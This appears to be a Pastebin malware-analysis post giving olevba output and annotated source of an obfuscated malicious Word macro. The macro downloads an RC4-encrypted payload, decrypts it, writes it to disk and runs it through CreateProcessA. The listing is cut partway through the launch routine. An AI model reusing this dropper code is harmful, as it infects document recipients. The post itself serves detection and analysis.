dynamoo

Malicious Word macro

Aug 10th, 2015
603
0
Never
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MAS-HB-V gabrie~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: gabrie~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Option Explicit
      ' Analyst note: module-level API imports, state and structures used by the macro.
      ' Every identifier is randomised; the Lib/Alias strings are the only readable
      ' names in this section.
      ' Imported from msvbvm60 by ordinal, so no API name appears in the source.
      ' Call sites pass (byte count, VarPtr(destination), VarPtr(source)), i.e. it is
      ' used as a raw memory copy - presumably __vbaCopyBytes; confirm the ordinal.
  16. Private Declare Sub XtJgfXpzM0o Lib "msvbvm60" Alias "#183" (ByVal WFnd4OMfpypp As Long, ByVal MA8xSY34fYF As Long, ByVal Yr1EUCzWPEV As Long)
      ' 256-entry state table filled by Property Let Uv3FkJoNQA (cipher S-box).
  17. Private RHxGLF7sfU9jTA(0 To 255) As Integer
      ' WinINet import: reads the HTTP response body into a string buffer.
  18. Private Declare Function InternetReadFile Lib "wininet" (ByVal BsQpCLLXzMEvnbP As Long, ByVal ByIUR9kXLkqd As String, ByVal IiE5gj As Long, FwLosyl3 As Long) As Integer
      ' Node of the binary code tree built by GuQHe80AnN: UVv = parent index,
      ' O2jX1pn7C = child followed on a 0 bit, Qoey8CXRBAw3 = child followed on a 1 bit,
      ' SNovaUJISNL = decoded symbol (-1 when the node is not a leaf).
      ' R5EwrcPEV is not referenced anywhere in the visible code.
  19. Private Type HnF3nxQRcws6HMjP
  20.    UVv As Integer
  21.    Qoey8CXRBAw3 As Integer
  22.    O2jX1pn7C As Integer
  23.    SNovaUJISNL As Integer
  24.    R5EwrcPEV As Long
  25. End Type
      ' NOTE(review): declared ByRef here, whereas the WinINet API takes the handle by
      ' value - the handles are probably not closed correctly; confirm.
  26. Private Declare Function InternetCloseHandle Lib "wininet" (ByRef BVl3mNCKlwA As Long) As Long
      ' Last key passed to Property Let Uv3FkJoNQA (lets it skip re-keying on a repeat).
  27. Private NeeCb9nU As String
      ' WinINet import: opens the session (first argument is the user-agent string).
  28. Private Declare Function InternetOpenA Lib "wininet" (ByVal O6ZjTnc8OFWA5Bv As String, ByVal NozkkMPUli As Long, ByVal AraM As String, ByVal UTFUHhkgrn0i4EzDT As String, ByVal QrQmF As Long) As Long
  29. Private Declare Function CloseHandle Lib "kernel32" (ByVal TmZAxWwYeCO1Yf As Long) As Long
      ' Four Longs, passed as the last argument of CreateProcessA - layout matches
      ' PROCESS_INFORMATION (hProcess, hThread, dwProcessId, dwThreadId).
  30. Private Type L4B1C0pyIp
  31.    VAFd4ZagjNElZ As Long
  32.    Xd4V8MZgn As Long
  33.    RLz7m6u53j6da As Long
  34.    MoYi3kw937sOiZ As Long
  35. End Type
      ' Passed as the ninth argument of CreateProcessA - layout matches STARTUPINFO;
      ' the first field (YTNxZe1) receives the structure size in I6aL9VLToJH.
  36. Private Type SdZ6VX73YaIjvCV7r
  37.    YTNxZe1 As Long
  38.    PsgpZ4s7JFnTtwm As String
  39.    Nu5F8zzCCR As String
  40.    GRswFGc460eKR As String
  41.    XfJnRw6wqW As Long
  42.    BXqanWDcNG6IJOz As Long
  43.    BZl59mVWzJZ As Long
  44.    LfvUBOWp As Long
  45.    J9bvR3b2xs1 As Long
  46.    VMI4ild0Cyy As Long
  47.    KzjIDjo As Long
  48.    DQKDZf6ptgL As Long
  49.    P0TzA8k5axSX As Integer
  50.    Jd8LvaAh As Integer
  51.    JRP11gOcYuamB As Long
  52.    LNqJpp3sSFAi As Long
  53.    HlNQJVUgA As Long
  54.    XKZXzHQ8udx As Long
  55. End Type
      ' Process-creation import: the macro starts the dropped file through the raw
      ' API rather than through Shell or WScript.
  56. Private Declare Function CreateProcessA Lib "kernel32" (ByVal RqNE57PsnE6 As String, ByVal OO2mfAs4i6zKg As String, TcvsDu As Any, Tm87GuTDgI As Any, ByVal VSpjlsuu1 As Long, ByVal K1Zy As Long, QZmGMhCt5h8JUIY As Any, ByVal YaJkdiN6WRQ As String, U0h7Oa As SdZ6VX73YaIjvCV7r, AxRZ0A As L4B1C0pyIp) As Long
      ' WinINet import: opens the URL on the session handle.
  57. Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal SdLGMi5LRTTc8OF As Long, ByVal GKmRqD0avhBh As String, ByVal JIT8V As String, ByVal PqbJ9yspgiViiWYI2 As Long, ByVal KezyxR As Long, ByVal HcNQZmZAxWwYeC As Long) As Long
      ' Per-symbol code table entry: Jyq7kWxLEuXU = code length in bits,
      ' Psfw7jyizqX2pBr = the code's bits, one 0/1 value per array element.
  58. Private Type UP6g2cwz9
  59.    Jyq7kWxLEuXU As Byte
  60.    Psfw7jyizqX2pBr() As Byte
  61. End Type
  62. Private Property Let Uv3FkJoNQA(Duor5EX1QDGRv As String)
      ' Key setup for the string/payload cipher. The two loops below are the RC4
      ' key-scheduling algorithm: identity-fill the 256-entry table, then swap
      ' entries under control of the key bytes. The result is left in the
      ' module-level table RHxGLF7sfU9jTA.
      ' Parameter: the key as a VBA string (converted to ANSI bytes).
  63. Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
      ' Same key as last time: keep the table that was already scheduled.
  64. If (NeeCb9nU = Duor5EX1QDGRv) Then Exit Property
  65. NeeCb9nU = Duor5EX1QDGRv
  66. HmKeQofQiXVxVGCT() = StrConv(NeeCb9nU, vbFromUnicode)
  67. L9EY5PIy8XL = Len(NeeCb9nU)
      ' S[i] = i
  68. For Nz7m0PxKYWw = 0 To 255
  69. RHxGLF7sfU9jTA(Nz7m0PxKYWw) = Nz7m0PxKYWw
  70. Next Nz7m0PxKYWw
      ' j = (j + S[i] + key[i mod keylen]) mod 256; swap S[i], S[j]
  71. For Nz7m0PxKYWw = 0 To 255
  72. HbS1melaNAS7H = (HbS1melaNAS7H + RHxGLF7sfU9jTA(Nz7m0PxKYWw) + HmKeQofQiXVxVGCT(Nz7m0PxKYWw Mod L9EY5PIy8XL)) Mod 256
  73. L7N3MtqbtznJ = RHxGLF7sfU9jTA(Nz7m0PxKYWw)
  74. RHxGLF7sfU9jTA(Nz7m0PxKYWw) = RHxGLF7sfU9jTA(HbS1melaNAS7H)
  75. RHxGLF7sfU9jTA(HbS1melaNAS7H) = L7N3MtqbtznJ
  76. Next
  77. End Property
  78. Private Function XCDD1KlyfOUL(MuPhPeG3mQ As String) As String
      ' String wrapper around the decompressor U4j0Mutcw: converts the input to
      ' ANSI bytes, lets U4j0Mutcw replace the array with the decoded data, and
      ' returns the result converted back to a VBA string.
  79. Dim LvAzbXXkWUDtDQ() As Byte
  80. LvAzbXXkWUDtDQ() = StrConv(MuPhPeG3mQ, vbFromUnicode)
  81. U4j0Mutcw LvAzbXXkWUDtDQ, Len(MuPhPeG3mQ)
  82. XCDD1KlyfOUL = StrConv(LvAzbXXkWUDtDQ(), vbUnicode)
  83. End Function
  84. Private Function BRfjljWglIbMl(ByVal YJWdGt9qTqFwPH7i As String, ByVal VD95k1JIF As String, ByVal WVmg38wK9PrBsoCtu As String) As Boolean
      ' Download-decode-write stage.
      ' Parameters (in order): URL to fetch, local path to write, cipher key.
      ' Flow: WinINet session -> open URL -> read the whole body -> RC4-decrypt with
      ' the key (IqAGSLPUAJG) -> decompress (XCDD1KlyfOUL) -> write to the path.
      ' Returns True when the accumulated response length is non-zero.
      ' Defender note: the file that reaches disk is NOT the bytes seen on the wire;
      ' the response is encrypted and compressed, so a network capture of this
      ' download will not match a hash of the dropped file.
      ' Junk block (recurs throughout this function): the constants always sum to
      ' more than 4, the MsgBox branch is never reached and the assigned variable is
      ' never read. It has no effect on behaviour and only pads/varies the source.
  85. Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
  86. ACIZjEo8pvcIr = 80
  87. I3wVba3qWHhnCuC = 19
  88. If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
  89. I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
  90. Else
  91. MsgBox 45
  92. End If
  93. Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
  94. Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
  95. AI9EyT0hz = 55
  96. LDwIMi8qU8zv = 92
  97. If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
  98. LDwIMi8qU8zv = AI9EyT0hz + 8
  99. Else
  100. MsgBox 87
  101. End If
      ' Open the WinINet session. The first argument (user-agent string) is a
      ' 67-byte blob decrypted at run time with key "GqhL"; it is not decoded in
      ' this listing. Access type 1 = INTERNET_OPEN_TYPE_DIRECT (no proxy).
  102. FP3AL83PNIVhYqp = InternetOpenA(IqAGSLPUAJG(Chr(67) + Chr(59) + Chr(213) + Chr(21) + Chr(152) + Chr(247) + Chr(165) + Chr(137) + Chr(22) + Chr(103) + Chr(186) + Chr(195) + Chr(29) + Chr(120) + Chr(96) + Chr(214) + Chr(246) + Chr(92) + Chr(44) + Chr(9) + Chr(6) + Chr(16) + Chr(144) + Chr(41) + Chr(68) + Chr(57) + Chr(183) + Chr(140) + Chr(2) + Chr(115) + Chr(127) + Chr(9) + Chr(142) + Chr(166) + Chr(107) + Chr(124) + Chr(21) + Chr(81) + Chr(45) + Chr(249) + Chr(16) + Chr(46) + Chr(215) + Chr(115) + Chr(22) + Chr(147) + Chr(29) + Chr(237) + Chr(9) + Chr(93) + Chr(31) + Chr(76) + Chr(87) + Chr(187) + Chr(48) + Chr(26) + Chr(205) + Chr(30) + Chr(194) + Chr(246) + Chr(158) + Chr(104) + Chr(0) + Chr(24) + Chr(182) + Chr(106) + Chr(151), "GqhL"), 1, vbNullString, vbNullString, 0)
  103. Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
  104. BkbpvlCIZj = 4
  105. VS1rCLO33mU = 22
  106. If BkbpvlCIZj + VS1rCLO33mU > 4 Then
  107. VS1rCLO33mU = BkbpvlCIZj + 67
  108. Else
  109. MsgBox 57
  110. End If
      ' No session handle: report failure.
  111. If FP3AL83PNIVhYqp = 0 Then
  112. Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
  113. ILWUKAm = 89
  114. JRN9ZgNj6Yf = 89
  115. If ILWUKAm + JRN9ZgNj6Yf > 4 Then
  116. JRN9ZgNj6Yf = ILWUKAm + 42
  117. Else
  118. MsgBox 58
  119. End If
  120.   BRfjljWglIbMl = False
  121.   Exit Function
  122. End If
  123. Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
  124. WqZT6KvAVkyO = 74
  125. OHPW2b0ZGFa = 62
  126. If WqZT6KvAVkyO + OHPW2b0ZGFa > 4 Then
  127. OHPW2b0ZGFa = WqZT6KvAVkyO + 97
  128. Else
  129. MsgBox 91
  130. End If
      ' Request the URL. Flag &H4000000 is INTERNET_FLAG_NO_CACHE_WRITE, so the
      ' response is not stored in the WinINet cache (one fewer on-disk artifact).
  131. Bhu6AVZ = InternetOpenUrlA(FP3AL83PNIVhYqp, YJWdGt9qTqFwPH7i, vbNullString, 0, &H4000000, 0)
  132. Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
  133. HbUu4uL = 81
  134. GfUsdMAvdCRNJDXy8 = 16
  135. If HbUu4uL + GfUsdMAvdCRNJDXy8 > 4 Then
  136. GfUsdMAvdCRNJDXy8 = HbUu4uL + 39
  137. Else
  138. MsgBox 16
  139. End If
  140. If Bhu6AVZ = 0 Then
  141. Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
  142. AizpYIBM = 53
  143. BYtWR9n2OwKs = 27
  144. If AizpYIBM + BYtWR9n2OwKs > 4 Then
  145. BYtWR9n2OwKs = AizpYIBM + 78
  146. Else
  147. MsgBox 22
  148. End If
  149.   YBoXWN0Xv = 0
  150. Else
  151. Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
  152. Izv2Cof = 90
  153. Ntxt3NxnUsY = 60
  154. If Izv2Cof + Ntxt3NxnUsY > 4 Then
  155. Ntxt3NxnUsY = Izv2Cof + 52
  156. Else
  157. MsgBox 30
  158. End If
      ' First read. The whole 8162-character fixed buffer is copied, not just the
      ' number of bytes reported in HzD7nSW.
  159. InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  160. JkOPSi = IFHWQgDBF4yZ
  161. Dim V0fF89S As Long, HVcFPWU6 As Long
  162. V0fF89S = 25
  163. HVcFPWU6 = 85
  164. If V0fF89S + HVcFPWU6 > 4 Then
  165. HVcFPWU6 = V0fF89S + 3
  166. Else
  167. MsgBox 4
  168. End If
      ' Keep reading 8162-byte chunks until a read reports zero bytes.
  169. Do While HzD7nSW <> 0
  170.   InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  171.   JkOPSi = JkOPSi + Mid(IFHWQgDBF4yZ, 1, HzD7nSW)
  172. Loop
  173. YBoXWN0Xv = Len(JkOPSi)
  174. Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
  175. K1Xi = 24
  176. QZlNuLHUlh7Q2xe = 13
  177. If K1Xi + QZlNuLHUlh7Q2xe > 4 Then
  178. QZlNuLHUlh7Q2xe = K1Xi + 92
  179. Else
  180. MsgBox 53
  181. End If
  182. I0xSQ = FreeFile
  183. Dim GPlaAi As Long, JIM8pwVkCW8UVbcg As Long
  184. GPlaAi = 64
  185. JIM8pwVkCW8UVbcg = 91
  186. If GPlaAi + JIM8pwVkCW8UVbcg > 4 Then
  187. JIM8pwVkCW8UVbcg = GPlaAi + 11
  188. Else
  189. MsgBox 51
  190. End If
      ' Write stage: decrypt the response with the caller's key, decompress it,
      ' and write the result to the target path in binary mode.
  191. Open VD95k1JIF For Binary Access Write Lock Write As #I0xSQ
  192. Put #I0xSQ, , XCDD1KlyfOUL(IqAGSLPUAJG(JkOPSi, WVmg38wK9PrBsoCtu))
  193. Dim Oq8fiSM As Long, YvnMiEy2R6 As Long
  194. Oq8fiSM = 80
  195. YvnMiEy2R6 = 73
  196. If Oq8fiSM + YvnMiEy2R6 > 4 Then
  197. YvnMiEy2R6 = Oq8fiSM + 95
  198. Else
  199. MsgBox 28
  200. End If
  201. Close #I0xSQ
  202. End If
  203. InternetCloseHandle Bhu6AVZ
  204. Dim B9v7TU As Long, JCVUa86krMIbHfc As Long
  205. B9v7TU = 52
  206. JCVUa86krMIbHfc = 59
  207. If B9v7TU + JCVUa86krMIbHfc > 4 Then
  208. JCVUa86krMIbHfc = B9v7TU + 10
  209. Else
  210. MsgBox 86
  211. End If
  212. InternetCloseHandle FP3AL83PNIVhYqp
  213. JkOPSi = ""
      ' Success is judged only by "some data was received".
  214. If YBoXWN0Xv Then
  215.   BRfjljWglIbMl = True
  216. Dim KKDp5Ep2gOzyvo As Long, Tl1iPS1z8j As Long
  217. KKDp5Ep2gOzyvo = 22
  218. Tl1iPS1z8j = 75
  219. If KKDp5Ep2gOzyvo + Tl1iPS1z8j > 4 Then
  220. Tl1iPS1z8j = KKDp5Ep2gOzyvo + 14
  221. Else
  222. MsgBox 73
  223. End If
  224. End If
  225. Dim LwX3RpBGRr As Long, Ne5f44rm9prF As Long
  226. LwX3RpBGRr = 91
  227. Ne5f44rm9prF = 13
  228. If LwX3RpBGRr + Ne5f44rm9prF > 4 Then
  229. Ne5f44rm9prF = LwX3RpBGRr + 2
  230. Else
  231. MsgBox 37
  232. End If
  233. End Function
  234. Private Sub GuQHe80AnN(IoX() As HnF3nxQRcws6HMjP, FihxAWkN5rFeaSJ As Long, UyXExoRTt As Long, Dc4RjY As UP6g2cwz9)
      ' Inserts one symbol's bit code into the binary decode tree.
      ' IoX             - node array (index 0 is the root)
      ' FihxAWkN5rFeaSJ - next free node index; incremented here for each node
      '                   created, so the caller sees the updated value
      ' UyXExoRTt       - symbol value stored at the end of the path
      ' Dc4RjY          - the symbol's code (bit count plus one 0/1 byte per bit)
  235. Dim RB8PuM7tI59 As Integer, LNBqYXa9HC1mwf As Long
      ' Start at the root and follow the code bit by bit.
  236. LNBqYXa9HC1mwf = 0
  237. For RB8PuM7tI59 = 0 To (Dc4RjY.Jyq7kWxLEuXU - 1)
      ' Bit 0: follow (creating if absent) the O2jX1pn7C child.
  238. If (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 0) Then
  239. If (IoX(LNBqYXa9HC1mwf).O2jX1pn7C = -1) Then
  240. IoX(LNBqYXa9HC1mwf).O2jX1pn7C = FihxAWkN5rFeaSJ
  241. IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
  242. IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
  243. IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
  244. IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
  245. FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
  246. End If
  247. LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).O2jX1pn7C
      ' Bit 1: follow (creating if absent) the Qoey8CXRBAw3 child.
  248. ElseIf (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 1) Then
  249. If (IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = -1) Then
  250. IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = FihxAWkN5rFeaSJ
  251. IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
  252. IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
  253. IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
  254. IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
  255. FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
  256. End If
  257. LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3
      ' Any other value in the bit array halts execution (Stop).
  258. Else
  259. Stop
  260. End If
  261. Next
      ' Mark the node reached at the end of the path with the symbol.
  262. IoX(LNBqYXa9HC1mwf).SNovaUJISNL = UyXExoRTt
  263. End Sub
  264. Function IqAGSLPUAJG(Svpxb5hcj9Hc As String, YNVoDatBR As String) As String
      ' String-level cipher wrapper: converts the input to ANSI bytes, runs
      ' BUqflSnxcA4 over them with the given key, and returns the result as a
      ' string. Every Chr(..)+Chr(..) blob in this module is passed through here
      ' with its own key, so the macro carries no plaintext URL, path or message.
      ' Analyst note: the cipher is a XOR keystream, so applying this routine to
      ' a blob with the same key again restores the original.
      ' Junk block (no behavioural effect): condition is always true.
  265. Dim MpMnYYUrP73 As Long, ROetXCPNdldbjBRLL As Long
  266. MpMnYYUrP73 = 22
  267. ROetXCPNdldbjBRLL = 75
  268. If MpMnYYUrP73 + ROetXCPNdldbjBRLL > 4 Then
  269. ROetXCPNdldbjBRLL = MpMnYYUrP73 + 14
  270. Else
  271. MsgBox 73
  272. End If
  273. Dim byteArray() As Byte
  274. byteArray() = StrConv(Svpxb5hcj9Hc, vbFromUnicode)
  275. BUqflSnxcA4 byteArray(), YNVoDatBR
  276. IqAGSLPUAJG = StrConv(byteArray(), vbUnicode)
      ' Junk block (no behavioural effect).
  277. Dim HTZPNFjjDT2 As Long, SaND1oEkTy6p As Long
  278. HTZPNFjjDT2 = 71
  279. SaND1oEkTy6p = 95
  280. If HTZPNFjjDT2 + SaND1oEkTy6p > 4 Then
  281. SaND1oEkTy6p = HTZPNFjjDT2 + 49
  282. Else
  283. MsgBox 87
  284. End If
  285. End Function
  286. Private Function AFwPH7i46wGhOhKi(Optional A9PrBsoCtu7 As String = "0123456789") As String
      ' Random-name generator: returns a string of random characters drawn from
      ' the alphabet argument (default: decimal digits). The length comes from
      ' Int(30 * Rnd) and is re-drawn until it is at least 4, i.e. 4 to 29
      ' characters. Document_Open uses the result as the base name of the
      ' dropped file, so the name differs on every run and is not a usable
      ' indicator; the pattern (digits only, 4-29 long) is.
      ' Junk block (recurs throughout this function): always-true condition,
      ' unreachable MsgBox, result never read.
  287. Dim KX0xfoqZ As Long, XwCIaRypq03 As Long
  288. KX0xfoqZ = 77
  289. XwCIaRypq03 = 4
  290. If KX0xfoqZ + XwCIaRypq03 > 4 Then
  291. XwCIaRypq03 = KX0xfoqZ + 24
  292. Else
  293. MsgBox 64
  294. End If
  295. Dim V3K42() As Byte, GL8BfUcBbEoS() As Byte, RDQPNIVhYqp As Long, JUgDQryKOCh As Long, EazVmg38wK As Long, NFE As String
  296. Dim Tb95B8i6DxgFsGcd As Long, HZPNFjjDT2oc6c9Vy As Long
  297. Tb95B8i6DxgFsGcd = 56
  298. HZPNFjjDT2oc6c9Vy = 13
  299. If Tb95B8i6DxgFsGcd + HZPNFjjDT2oc6c9Vy > 4 Then
  300. HZPNFjjDT2oc6c9Vy = Tb95B8i6DxgFsGcd + 71
  301. Else
  302. MsgBox 67
  303. End If
  304. EazVmg38wK = 0
  305. Dim VGBgsnX3r5L As Long, Dxwz5QD As Long
  306. VGBgsnX3r5L = 84
  307. Dxwz5QD = 81
  308. If VGBgsnX3r5L + Dxwz5QD > 4 Then
  309. Dxwz5QD = VGBgsnX3r5L + 90
  310. Else
  311. MsgBox 62
  312. End If
      ' Retry label: jumped back to while the drawn length is below 4.
  313. GKs2Tl:
  314. Dim Uc0lRQhC4jaN7 As Long, Hl7hjLXCBG As Long
  315. Uc0lRQhC4jaN7 = 85
  316. Hl7hjLXCBG = 78
  317. If Uc0lRQhC4jaN7 + Hl7hjLXCBG > 4 Then
  318. Hl7hjLXCBG = Uc0lRQhC4jaN7 + 1
  319. Else
  320. MsgBox 33
  321. End If
  322. Randomize
      ' NFE is declared As String; the draw is stored as text and compared/assigned
      ' numerically below (relies on VBA's implicit conversion).
  323. NFE = Int(30 * Rnd)
  324. If NFE < 4 Then GoTo GKs2Tl
  325. EazVmg38wK = NFE
  326. If EazVmg38wK > 0& Then
  327. Dim EhzZDcEu As Long, Cm6XVQSt0NPM As Long
  328. EhzZDcEu = 80
  329. Cm6XVQSt0NPM = 94
  330. If EhzZDcEu + Cm6XVQSt0NPM > 4 Then
  331. Cm6XVQSt0NPM = EhzZDcEu + 52
  332. Else
  333. MsgBox 77
  334. End If
  335. Randomize
      ' String assigned to a Byte array: two bytes per character, which is why
      ' the indexes below are multiplied by 2.
  336. V3K42 = A9PrBsoCtu7
  337. Dim QCwa3abOUkh As Long, SwyAklrkV6C4LZi As Long
  338. QCwa3abOUkh = 84
  339. SwyAklrkV6C4LZi = 53
  340. If QCwa3abOUkh + SwyAklrkV6C4LZi > 4 Then
  341. SwyAklrkV6C4LZi = QCwa3abOUkh + 74
  342. Else
  343. MsgBox 85
  344. End If
  345. RDQPNIVhYqp = Len(A9PrBsoCtu7) - 1&
      ' Upper bound of the output byte array: 2 bytes per character, zero-based.
  346. EazVmg38wK = (EazVmg38wK * 2&) - 1&
  347. Dim IUKvWfty As Long, PwY9F2JkA As Long
  348. IUKvWfty = 29
  349. PwY9F2JkA = 46
  350. If IUKvWfty + PwY9F2JkA > 4 Then
  351. PwY9F2JkA = IUKvWfty + 69
  352. Else
  353. MsgBox 24
  354. End If
  355. ReDim GL8BfUcBbEoS(EazVmg38wK) As Byte
      ' Fill every even byte with a randomly chosen alphabet character; the odd
      ' bytes stay zero.
  356. For JUgDQryKOCh = 0& To EazVmg38wK Step 2&
  357. GL8BfUcBbEoS(JUgDQryKOCh) = V3K42(CLng(RDQPNIVhYqp * Rnd) * 2&)
  358. Next
  359. Dim DiT8qxL As Long, Ht4qxpGiCdM As Long
  360. DiT8qxL = 94
  361. Ht4qxpGiCdM = 50
  362. If DiT8qxL + Ht4qxpGiCdM > 4 Then
  363. Ht4qxpGiCdM = DiT8qxL + 10
  364. Else
  365. MsgBox 78
  366. End If
  367. End If
  368. Dim DqjDljxQl1 As Long, OYFEfskkJd As Long
  369. DqjDljxQl1 = 72
  370. OYFEfskkJd = 42
  371. If DqjDljxQl1 + OYFEfskkJd > 4 Then
  372. OYFEfskkJd = DqjDljxQl1 + 7
  373. Else
  374. MsgBox 12
  375. End If
      ' The byte array is returned as the function's String result.
  376. AFwPH7i46wGhOhKi = GL8BfUcBbEoS
  377. Dim OtzUoqPfJBgR As Long, TcUKOAdU5u As Long
  378. OtzUoqPfJBgR = 81
  379. TcUKOAdU5u = 17
  380. If OtzUoqPfJBgR + TcUKOAdU5u > 4 Then
  381. TcUKOAdU5u = OtzUoqPfJBgR + 11
  382. Else
  383. MsgBox 54
  384. End If
  385. End Function
  386. Sub HOglzOSpjr9h(JKRfEn As Long)
      ' Delay helper: spins until Timer has advanced by JKRfEn seconds, calling
      ' DoEvents on each pass. Document_Open calls it with 1 between writing the
      ' file and launching it.
      ' Junk block (recurs below): always-true condition, no behavioural effect.
  387. Dim CAplbsdkljPz7 As Long, Id24U2e1NOsFmrSQm As Long
  388. CAplbsdkljPz7 = 77
  389. Id24U2e1NOsFmrSQm = 73
  390. If CAplbsdkljPz7 + Id24U2e1NOsFmrSQm > 4 Then
  391. Id24U2e1NOsFmrSQm = CAplbsdkljPz7 + 39
  392. Else
  393. MsgBox 17
  394. End If
  395. Dim PocouifAMac As Long
  396. Dim FOAdU5ue As Long, DRPjKIqgqa As Long
  397. FOAdU5ue = 98
  398. DRPjKIqgqa = 37
  399. If FOAdU5ue + DRPjKIqgqa > 4 Then
  400. DRPjKIqgqa = FOAdU5ue + 48
  401. Else
  402. MsgBox 63
  403. End If
      ' Deadline = current Timer value plus the requested number of seconds.
  404. PocouifAMac = Timer + JKRfEn
  405. Do While Timer < PocouifAMac
  406. DoEvents
  407. Loop
  408. Dim JjMWu As Long, Oe6vqA48 As Long
  409. JjMWu = 28
  410. Oe6vqA48 = 49
  411. If JjMWu + Oe6vqA48 > 4 Then
  412. Oe6vqA48 = JjMWu + 60
  413. Else
  414. MsgBox 53
  415. End If
  416. End Sub
  417. Sub BUqflSnxcA4(N5eK6er7Tq80J5O() As Byte, Optional Nn4LNDdOko As String)
      ' In-place stream cipher over a byte array. Together with the key setup in
      ' Property Let Uv3FkJoNQA this is RC4: the loop below is the RC4 keystream
      ' generator, XORed onto the data. The same call both encrypts and decrypts.
      ' N5eK6er7Tq80J5O - data, modified in place
      ' Nn4LNDdOko      - key; when empty, the previously scheduled table is reused
  418. Dim AqfL As Long, USK5uYyaKrznfrpS As Long, UISSgE9sWQpCZRT As Byte, GE0OEFxN540yRo As Long, I4uc9FMhZVQ5 As Long, I0xRV As Long, YBnG6IJOz(0 To 255) As Integer
      ' Assigning the property runs the key schedule.
  419. If (Len(Nn4LNDdOko) > 0) Then Uv3FkJoNQA = Nn4LNDdOko
      ' Copy the scheduled table (256 Integers = 512 bytes) into a local working
      ' copy, so the module-level table stays in its freshly keyed state.
  420. XtJgfXpzM0o 512, VarPtr(YBnG6IJOz(0)), VarPtr(RHxGLF7sfU9jTA(0))
  421. I4uc9FMhZVQ5 = UBound(N5eK6er7Tq80J5O) + 1
  422. I0xRV = I4uc9FMhZVQ5
  423. For GE0OEFxN540yRo = 0 To (I4uc9FMhZVQ5 - 1)
      ' i = (i + 1) mod 256; j = (j + S[i]) mod 256; swap S[i], S[j]
  424. AqfL = (AqfL + 1) Mod 256
  425. USK5uYyaKrznfrpS = (USK5uYyaKrznfrpS + YBnG6IJOz(AqfL)) Mod 256
  426. UISSgE9sWQpCZRT = YBnG6IJOz(AqfL)
  427. YBnG6IJOz(AqfL) = YBnG6IJOz(USK5uYyaKrznfrpS)
  428. YBnG6IJOz(USK5uYyaKrznfrpS) = UISSgE9sWQpCZRT
      ' data[n] = data[n] Xor S[(S[i] + S[j]) mod 256]
  429. N5eK6er7Tq80J5O(GE0OEFxN540yRo) = N5eK6er7Tq80J5O(GE0OEFxN540yRo) Xor (YBnG6IJOz((YBnG6IJOz(AqfL) + YBnG6IJOz(USK5uYyaKrznfrpS)) Mod 256))
  430. Next
  431. End Sub
  432. Private Function I6aL9VLToJH(IIJfd79SYH5wwt As String)
      ' Execution stage: starts the given command line as a new process through
      ' CreateProcessA and closes the two returned handles. Nothing is returned.
      ' Defender note: the new process is created by the Office application
      ' itself, so it appears as a direct child of the process that opened the
      ' document - the parent/child pair is the behaviour to alert on.
      ' Junk block (recurs throughout this function): always-true condition,
      ' unreachable MsgBox, no behavioural effect.
  433. Dim Oq6oBCvt As Long, FJRGcif8CeY As Long
  434. Oq6oBCvt = 73
  435. FJRGcif8CeY = 96
  436. If Oq6oBCvt + FJRGcif8CeY > 4 Then
  437. FJRGcif8CeY = Oq6oBCvt + 29
  438. Else
  439. MsgBox 31
  440. End If
  441. Dim MoEVGldi9Pup9e As L4B1C0pyIp, QKALtRfjljW As SdZ6VX73YaIjvCV7r, P2aN9z5AlMfsXf8 As String
  442. Dim B9v5cx As Long, JDTc31TT8AIYP9WO As Long
  443. B9v5cx = 52
  444. JDTc31TT8AIYP9WO = 60
  445. If B9v5cx + JDTc31TT8AIYP9WO > 4 Then
  446. JDTc31TT8AIYP9WO = B9v5cx + 10
  447. Else
  448. MsgBox 60
  449. End If
      ' First field of the startup structure = its own size.
